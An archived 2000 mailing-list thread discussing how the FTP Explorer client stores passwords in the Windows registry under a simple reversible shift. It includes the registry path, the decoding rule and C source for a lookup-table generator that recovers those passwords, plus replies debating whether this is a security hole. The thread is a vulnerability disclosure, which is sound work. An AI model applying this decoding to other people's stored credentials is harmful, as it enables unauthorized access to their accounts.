I've notice the similar behavior, and in fact, I've used it to decyrpt passwords I've forgotten. However, I DO think that it is a security hole that when you uninstall this software, it does NOT delete the registry entries. Therefore, if one installs FTP Explorer on a machine that previously had it installed, all of the old passwords and accounts are still there. So you can log into someone else's stuff. This is especially a concern here at the University of Delaware as many people install and remove shareware from public computing sites. -Rishi On Fri, 25 Feb 2000, Seth R Arnold wrote: > Nelson, excuse my asking, but .. is this not the expected behavior? > > Any client that stores login/password information must store it in a > plain-text equivalent form on the hard drive, *unless it prompts the > user for a key with which to unlock the information*. Unless it uses a > key supplied by the user, it must be based on something similar to this. > > If FTP Explorer is actually a server, then this is insecure -- servers > should store hashes of passwords, not passwords. If FTP Explorer is an > ftp client, one would hope it documents the storing of passwords; to my > way of thinking, not prompting for passwords the next time a site is > used is documentation enough for anyone that cares about their security. > Anyone for whom this isn't enough likely doesn't care about their > security. > > If you are worried about other people on your machine getting at the > password through the registry, then I would hope the security settings > on the registry are setup to disallow access -- but that would be WinNT > only. > > Don't get me wrong -- this is good detective work. However, to my way of > thinking, this is also expected behavior. > > Flames welcome. Autoreplies "I am out of the office" are not. :) > > On Thu, Feb 24, 2000 at 09:18:52PM -0300, Nelson wrote: > > The scene: > > user -> nelson > > pass -> ABC > > > > ON Connect Window, typed login == nelson and pass == ***(ABC), made a > > connection in my own ftp server. After this, I found this KEY in Windows > > REGISTRY: > > HKEY_CURRENT_USER -> Software -> FTP Explorer -> Profiles -> MY_OWN_SERVER > > > > and I found two values: > > Login = nelson > > Type = 4A4E52 > > > > Hmmm... looks like a encrypted password to me... > > > > Ok, the crypt function in FTP Explorer works like that: > > get the ascii hexa value and increment 9, if the position in password was > > changed, increment 3 per position. > > > > IN order words, a progression arithmetical. > > > > I made a code to proof this, look the result: > > unreal:~/temp$ ./ftpe-crypt -t 3 -i 9 -r 3 -s teste > > Criptografia do FTP Explorer v0.6b - por Nelson Brito > > unreal:~/temp$ more teste > > [...] > > A = 4A = 4D = 50 > > `-> correct > > B = 4B = 4E = 51 > > `-> correct > > C = 4C = 4F = 52 > > `-> correct > > [...] > > > > Well, the password is 'ABC'... Is it a big security hole? I think so... > > > > PS: The credits to begin this thread in BOS-Br<bosat_private> goes to > > Hever<Heverat_private>. > > > > PPS: Sorry about my poor ENGLISH. If don't understand, don't read. =) > > > > My proof... > > > > -------begin > > /* > > ** Este codigo demostra como funciona a "criptografia" do software FTP > > ** Explorer, levando-se em consideracao as informacoes passadas para a > > ** BOS-Br por Hever<Heverat_private>. > > ** > > ** author: Nelson Brito > > ** e-mails: nelsonat_private & nelsonat_private > > ** program: ftpe-crypt.c > > ** > > ** ChangeLog: > > ** v 0.6b - arquivo de destino incluido(output file) > > ** - apartir desta versao sera' necessario a utilizacao de todos os > > ** argumentos na linha de comando > > ** v 0.5b - incluido opcoes longas na linha de comando > > ** - problemas da opcao '-h' corrigidos gracas a fpm :*( ) ) > > ** v 0.4 - opcoes de linha de comando acrescentadas, permitindo que o > > ** usuario "set" suas preferencias [a.k.a. getopt(3)] > > ** v 0.3 - adicionado argumentos passados para a funcao r2() > > ** - contador a ser usado em r2() como argumento > > ** v 0.2 - desenvolvimento das funcao r2() e inclusao de u_abort()) e > > ** logo() > > ** - o length do password foi aumentado > > ** v 0.1 - desenvolvimento inicial do esqueleto do programa, incluindo: > > ** > retirada dos caracteres especiais, ie, so' [a-z][A-Z][0-9] > > ** > uma simples PA, sem utilizacao de formula ou funcao > > ** > > ** Agradecimentos a drk, Morauder e fpm pela forca com o getopt(3). =) > > ** > > ** Como compilar(How to compile): > > ** lameness:~# gcc -Wall -O3 -g ftpe-crypt.c -o ftpe-crypt > > */ > > > > #include <stdio.h> > > #include <signal.h> > > #include <stdlib.h> > > #include <getopt.h> > > #include <unistd.h> > > #define VERSION "0.6b" > > > > int r2(int n, int p, int i, int b, FILE *fp){ > > n=((n+b)+(i*p)); > > fprintf(fp, "= %X ", n); > > return(n); > > } > > > > char usage(char *p){ > > fprintf(stderr, "use: %s -l <length> -i <increment> -r <ratio> -o <output-file>\n", p); > > fprintf(stderr, "example: %s -l 15 -i 9 -r 3 -o outlist\n", p); > > fprintf(stderr, "options:\n\t -l, --length password's length\n"); > > fprintf(stderr, "\t -i, --increment ASCII Table's increment\n"); > > fprintf(stderr, "\t -r, --ratio PA's ratio\n"); > > fprintf(stderr, "\t -o, --output output file\n"); > > fprintf(stderr, "\nfor ftpe's criptography use r=3, i=9\n"); > > exit(0); > > } > > > > int main(int ac, char **av){ > > FILE *outlist = NULL; > > > > register int a = 48; > > int r = 0, inc = 0, ct = 0, op; > > > > printf("FTP Explorer's Criptography v%s - by Nelson Brito\n", VERSION); > > > > if(ac != 9) usage(av[0]); > > > > while(1){ > > static struct option long_options[] = { > > {"length", 1, 0, 'l'}, > > {"ratio", 1, 0, 'r'}, > > {"increment", 1, 0, 'i'}, > > {"output", 1, 0, 'o'}, > > {0, 0, 0, 0} > > }; > > > > int option_index = 0; > > op = getopt_long(ac, av, "l:r:i:o:", long_options, &option_index); > > > > if (op == -1) break; > > > > switch(op){ > > case 'l': > > ct = atoi(optarg); > > break; > > case 'r': > > r = atoi(optarg); > > break; > > case 'i': > > inc = atoi(optarg); > > break; > > case 'o': > > if(!(outlist=fopen(optarg, "w"))){ > > printf("unable to open %s\n", optarg); > > exit(0); > > } > > break; > > default: > > usage(av[0]); > > break; > > } > > } > > > > while(a < 123){ > > > > if((a >= 58) && (a <= 64)){ > > printf("%c", (char)0); > > a++; > > } > > > > else if((a >= 91) && (a <= 96)){ > > printf("%c", (char)0); > > a++; > > } > > > > else{ > > register int c; > > > > fprintf(outlist, "%c ", (char)a); > > for(c = 0 ; c < ct ; c++) r2(a, c, r, inc, outlist); > > fprintf(outlist, "\n"); > > a++; > > } > > > > } > > > > fclose(outlist); > > > > return(1); > > } > > -------end > > > > Sem mais, > > -- > > Nelson - nb > > -- > Seth Arnold | http://www.willamette.edu/~sarnold/ > Hate spam? See http://maps.vix.com/rbl/ for help > Hi! I'm a .signature virus! Copy me into > your ~/.signature to help me spread! >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:38:00 PDT